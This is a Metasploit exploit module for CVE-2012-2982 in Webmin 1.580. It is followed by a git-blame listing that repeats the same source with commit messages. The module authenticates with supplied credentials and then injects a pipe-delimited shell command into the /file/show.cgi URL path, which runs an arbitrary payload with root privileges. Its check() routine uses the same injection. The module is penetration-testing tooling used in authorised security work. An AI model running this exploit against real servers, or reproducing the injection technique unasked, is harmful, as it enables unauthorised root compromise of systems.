metasploit-framework/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Webmin /file/show.cgi Remote Command Execution',
      'Description'    => %q{
          This module exploits an arbitrary command execution vulnerability in Webmin
        1.580. The vulnerability exists in the /file/show.cgi component and allows an
        authenticated user, with access to the File Manager Module, to execute arbitrary
        commands with root privileges. The module has been tested successfully with Webmin
        1.580 over Ubuntu 10.04.
      },
      'Author'         => [
        'Unknown', # From American Information Security Group
        'juan vazquez' # Metasploit module
      ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['OSVDB', '85248'],
          ['BID', '55446'],
          ['CVE', '2012-2982'],
          ['URL', 'http://www.americaninfosec.com/research/dossiers/AISG-12-001.pdf'],
          ['URL', 'https://github.com/webmin/webmin/commit/1f1411fe7404ec3ac03e803cfa7e01515e71a213']
        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 512,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl ruby python telnet',
            }
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        => [[ 'Webmin 1.580', { }]],
      'DisclosureDate' => 'Sep 06 2012',
      'DefaultTarget'  => 0))

      register_options(
        [
          Opt::RPORT(10000),
          OptBool.new('SSL', [true, 'Use SSL', true]),
          OptString.new('USERNAME',  [true, 'Webmin Username']),
          OptString.new('PASSWORD',  [true, 'Webmin Password'])
        ])
  end

  def check

    peer = "#{rhost}:#{rport}"

    vprint_status("Attempting to login...")

    data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}"

    res = send_request_cgi(
      {
        'method'  => 'POST',
        'uri'     => "/session_login.cgi",
        'cookie'  => "testing=1",
        'data'    => data
      }, 25)

    if res and res.code == 302 and res.get_cookies =~ /sid/
      vprint_good "Authentication successful"
      session = res.get_cookies.split("sid=")[1].split(";")[0]
    else
      vprint_error "Service found, but authentication failed"
      return Exploit::CheckCode::Detected
    end

    vprint_status("Attempting to execute...")

    command = "echo #{rand_text_alphanumeric(rand(5) + 5)}"

    res = send_request_cgi(
      {
        'uri'     => "/file/show.cgi/bin/#{rand_text_alphanumeric(5)}|#{command}|",
        'cookie'  => "sid=#{session}"
      }, 25)


    if res and res.code == 200 and res.message =~ /Document follows/
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end

  end

  def exploit

    peer = "#{rhost}:#{rport}"

    print_status("Attempting to login...")

    data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}"

    res = send_request_cgi(
      {
        'method'  => 'POST',
        'uri'     => "/session_login.cgi",
        'cookie'  => "testing=1",
        'data'    => data
      }, 25)

    if res and res.code == 302 and res.get_cookies =~ /sid/
      session = res.get_cookies.scan(/sid\=(\w+)\;*/).flatten[0] || ''
      if session and not session.empty?
        print_good "Authentication successfully"
      else
        print_error "Authentication failed"
        return
      end
      print_good "Authentication successfully"
    else
      print_error "Authentication failed"
      return
    end

    print_status("Attempting to execute the payload...")

    command = payload.encoded

    res = send_request_cgi(
      {
        'uri'     => "/file/show.cgi/bin/#{rand_text_alphanumeric(rand(5) + 5)}|#{command}|",
        'cookie'  => "sid=#{session}"
      }, 25)


    if res and res.code == 200 and res.message =~ /Document follows/
      print_good "Payload executed successfully"
    else
      print_error "Error executing the payload"
      return
    end

  end
end
Unix linefeeds, not windows That's what I get for just committing willy-nilly with a fresh install of Gvim for Windows. Also, this is an experiment to see if linefeeds are being respected in this editor Window. I doubt it will be, given GitHub's resistence to 50/72 as a sensible default. 2012-09-16 23:10:35 +00:00			`##`
use https for metaploit.com links 2017-07-24 13:26:21 +00:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Unix linefeeds, not windows That's what I get for just committing willy-nilly with a fresh install of Gvim for Windows. Also, this is an experiment to see if linefeeds are being respected in this editor Window. I doubt it will be, given GitHub's resistence to 50/72 as a sensible default. 2012-09-16 23:10:35 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 13:02:44 +00:00			`class MetasploitModule < Msf::Exploit::Remote`
Retab modules 2013-08-30 21:28:54 +00:00			`Rank = ExcellentRanking`

			`include Msf::Exploit::Remote::HttpClient`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Webmin /file/show.cgi Remote Command Execution',`
			`'Description' => %q{`
			`This module exploits an arbitrary command execution vulnerability in Webmin`
			`1.580. The vulnerability exists in the /file/show.cgi component and allows an`
			`authenticated user, with access to the File Manager Module, to execute arbitrary`
55 pages of spelling done 2017-09-08 01:18:50 +00:00			`commands with root privileges. The module has been tested successfully with Webmin`
Retab modules 2013-08-30 21:28:54 +00:00			`1.580 over Ubuntu 10.04.`
			`},`
			`'Author' => [`
			`'Unknown', # From American Information Security Group`
			`'juan vazquez' # Metasploit module`
			`],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
Revert "Land #6812, remove broken OSVDB references" This reverts commit 2b016e02165b7abf85c6847fcae2b6131f8a504d, reversing changes made to 7b1d9596c7c95097ef750407ff61f010714434a1. 2016-07-15 17:00:31 +00:00			`['OSVDB', '85248'],`
Retab modules 2013-08-30 21:28:54 +00:00			`['BID', '55446'],`
			`['CVE', '2012-2982'],`
			`['URL', 'http://www.americaninfosec.com/research/dossiers/AISG-12-001.pdf'],`
			`['URL', 'https://github.com/webmin/webmin/commit/1f1411fe7404ec3ac03e803cfa7e01515e71a213']`
			`],`
			`'Privileged' => true,`
			`'Payload' =>`
			`{`
			`'DisableNops' => true,`
			`'Space' => 512,`
			`'Compat' =>`
			`{`
			`'PayloadType' => 'cmd',`
Fix #5659: Update CMD exploits payload compatibility options 2015-08-10 22:12:59 +00:00			`'RequiredCmd' => 'generic perl ruby python telnet',`
Retab modules 2013-08-30 21:28:54 +00:00			`}`
			`},`
			`'Platform' => 'unix',`
			`'Arch' => ARCH_CMD,`
fied typo 2017-05-25 17:14:59 +00:00			`'Targets' => [[ 'Webmin 1.580', { }]],`
Retab modules 2013-08-30 21:28:54 +00:00			`'DisclosureDate' => 'Sep 06 2012',`
			`'DefaultTarget' => 0))`

			`register_options(`
			`[`
			`Opt::RPORT(10000),`
			`OptBool.new('SSL', [true, 'Use SSL', true]),`
			`OptString.new('USERNAME', [true, 'Webmin Username']),`
			`OptString.new('PASSWORD', [true, 'Webmin Password'])`
Fix msf/core and self.class msftidy warnings Also fixed rex requires. 2017-05-03 20:42:21 +00:00			`])`
Retab modules 2013-08-30 21:28:54 +00:00			`end`

			`def check`

			`peer = "#{rhost}:#{rport}"`

Remove now-redundant peer These all include either Msf::Exploit::Remote:Tcp or Msf::Exploit::Remote:HttpClient 2016-02-01 21:12:03 +00:00			`vprint_status("Attempting to login...")`
Retab modules 2013-08-30 21:28:54 +00:00
			`data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}"`

			`res = send_request_cgi(`
			`{`
			`'method' => 'POST',`
			`'uri' => "/session_login.cgi",`
			`'cookie' => "testing=1",`
			`'data' => data`
			`}, 25)`

Resolved some Set-Cookie warnings 2014-05-23 22:34:46 +00:00			`if res and res.code == 302 and res.get_cookies =~ /sid/`
Remove now-redundant peer These all include either Msf::Exploit::Remote:Tcp or Msf::Exploit::Remote:HttpClient 2016-02-01 21:12:03 +00:00			`vprint_good "Authentication successful"`
Resolved some Set-Cookie warnings 2014-05-23 22:34:46 +00:00			`session = res.get_cookies.split("sid=")[1].split(";")[0]`
Retab modules 2013-08-30 21:28:54 +00:00			`else`
Remove now-redundant peer These all include either Msf::Exploit::Remote:Tcp or Msf::Exploit::Remote:HttpClient 2016-02-01 21:12:03 +00:00			`vprint_error "Service found, but authentication failed"`
Saving progress Progress group 2: Making sure these checks comply with the new guidelines. Please read: "How to write a check() method" found in the wiki. 2014-01-21 17:07:03 +00:00			`return Exploit::CheckCode::Detected`
Retab modules 2013-08-30 21:28:54 +00:00			`end`

Remove now-redundant peer These all include either Msf::Exploit::Remote:Tcp or Msf::Exploit::Remote:HttpClient 2016-02-01 21:12:03 +00:00			`vprint_status("Attempting to execute...")`
Retab modules 2013-08-30 21:28:54 +00:00
			`command = "echo #{rand_text_alphanumeric(rand(5) + 5)}"`

			`res = send_request_cgi(`
			`{`
			`'uri' => "/file/show.cgi/bin/#{rand_text_alphanumeric(5)}\|#{command}\|",`
			`'cookie' => "sid=#{session}"`
			`}, 25)`


			`if res and res.code == 200 and res.message =~ /Document follows/`
Saving progress Progress group 2: Making sure these checks comply with the new guidelines. Please read: "How to write a check() method" found in the wiki. 2014-01-21 17:07:03 +00:00			`return Exploit::CheckCode::Vulnerable`
Retab modules 2013-08-30 21:28:54 +00:00			`else`
			`return Exploit::CheckCode::Safe`
			`end`

			`end`

			`def exploit`

			`peer = "#{rhost}:#{rport}"`

Remove now-redundant peer These all include either Msf::Exploit::Remote:Tcp or Msf::Exploit::Remote:HttpClient 2016-02-01 21:12:03 +00:00			`print_status("Attempting to login...")`
Retab modules 2013-08-30 21:28:54 +00:00
			`data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}"`

			`res = send_request_cgi(`
			`{`
			`'method' => 'POST',`
			`'uri' => "/session_login.cgi",`
			`'cookie' => "testing=1",`
			`'data' => data`
			`}, 25)`

Resolved some Set-Cookie warnings 2014-05-23 22:34:46 +00:00			`if res and res.code == 302 and res.get_cookies =~ /sid/`
			`session = res.get_cookies.scan(/sid\=(\w+)\;*/).flatten[0] \|\| ''`
Retab modules 2013-08-30 21:28:54 +00:00			`if session and not session.empty?`
Remove now-redundant peer These all include either Msf::Exploit::Remote:Tcp or Msf::Exploit::Remote:HttpClient 2016-02-01 21:12:03 +00:00			`print_good "Authentication successfully"`
Retab modules 2013-08-30 21:28:54 +00:00			`else`
Remove now-redundant peer These all include either Msf::Exploit::Remote:Tcp or Msf::Exploit::Remote:HttpClient 2016-02-01 21:12:03 +00:00			`print_error "Authentication failed"`
Retab modules 2013-08-30 21:28:54 +00:00			`return`
			`end`
Remove now-redundant peer These all include either Msf::Exploit::Remote:Tcp or Msf::Exploit::Remote:HttpClient 2016-02-01 21:12:03 +00:00			`print_good "Authentication successfully"`
Retab modules 2013-08-30 21:28:54 +00:00			`else`
Remove now-redundant peer These all include either Msf::Exploit::Remote:Tcp or Msf::Exploit::Remote:HttpClient 2016-02-01 21:12:03 +00:00			`print_error "Authentication failed"`
Retab modules 2013-08-30 21:28:54 +00:00			`return`
			`end`

Remove now-redundant peer These all include either Msf::Exploit::Remote:Tcp or Msf::Exploit::Remote:HttpClient 2016-02-01 21:12:03 +00:00			`print_status("Attempting to execute the payload...")`
Retab modules 2013-08-30 21:28:54 +00:00
			`command = payload.encoded`

			`res = send_request_cgi(`
			`{`
			`'uri' => "/file/show.cgi/bin/#{rand_text_alphanumeric(rand(5) + 5)}\|#{command}\|",`
			`'cookie' => "sid=#{session}"`
			`}, 25)`


			`if res and res.code == 200 and res.message =~ /Document follows/`
Remove now-redundant peer These all include either Msf::Exploit::Remote:Tcp or Msf::Exploit::Remote:HttpClient 2016-02-01 21:12:03 +00:00			`print_good "Payload executed successfully"`
Retab modules 2013-08-30 21:28:54 +00:00			`else`
Remove now-redundant peer These all include either Msf::Exploit::Remote:Tcp or Msf::Exploit::Remote:HttpClient 2016-02-01 21:12:03 +00:00			`print_error "Error executing the payload"`
Retab modules 2013-08-30 21:28:54 +00:00			`return`
			`end`
Unix linefeeds, not windows That's what I get for just committing willy-nilly with a fresh install of Gvim for Windows. Also, this is an experiment to see if linefeeds are being respected in this editor Window. I doubt it will be, given GitHub's resistence to 50/72 as a sensible default. 2012-09-16 23:10:35 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`end`
Unix linefeeds, not windows That's what I get for just committing willy-nilly with a fresh install of Gvim for Windows. Also, this is an experiment to see if linefeeds are being respected in this editor Window. I doubt it will be, given GitHub's resistence to 50/72 as a sensible default. 2012-09-16 23:10:35 +00:00			`end`